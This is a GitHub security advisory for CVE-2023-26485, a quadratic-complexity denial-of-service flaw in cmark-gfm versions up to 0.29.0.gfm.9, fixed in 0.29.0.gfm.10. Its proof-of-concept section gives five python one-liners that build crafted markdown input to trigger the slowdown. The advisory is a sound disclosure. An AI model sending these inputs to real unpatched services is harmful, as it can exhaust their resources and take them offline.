Skip to content

Quadratic complexity bug may lead to a denial of service

Moderate
anticomputer published GHSA-r8vr-c48j-fcc5 Mar 31, 2023

Package

cmark-gfm

Affected versions

<= 0.29.0.gfm.9

Patched versions

0.29.0.gfm.10

Description

Impact

A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service.

Proof of concept

Each of the commands below triggers a different issue.

python3 -c 'pad = "_" * 10000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to plaintext
python3 -c 'pad = "_" * 10000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to commonmark
python3 -c 'n = 10000; print("1.\n" + " 2.\n"*n)' | time ./src/cmark-gfm -t commonmark
python3 -c 'n = 10000; print(" -"*n + "x\n")' | time ./src/cmark-gfm -t xml
python3 -c 'n = 10000; print(" -"*n + "x\n")' | time ./src/cmark-gfm -t man

Increasing the number 10000 in the above commands causes the running time to increase quadratically.

Patches

This vulnerability has been patched in 0.29.0.gfm.10.

Note on cmark and cmark-gfm

cmark-gfm is a fork of cmark that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. This bug only affects cmark-gfm as cmark had already patched this issue in their commonmark renderer and they do not contain the plaintext renderer.

Credit

We would like to thank @gravypod for reporting this vulnerability.

References

https://en.wikipedia.org/wiki/Time_complexity

For more information

If you have any questions or comments about this advisory:

Severity

Moderate

CVE ID

CVE-2023-26485

Weaknesses

Inefficient Algorithmic Complexity

An algorithm in a product has an inefficient worst-case computational complexity that may be detrimental to system performance and can be triggered by an attacker, typically using crafted manipulations that ensure that the worst case is being reached. Learn more on MITRE.

Credits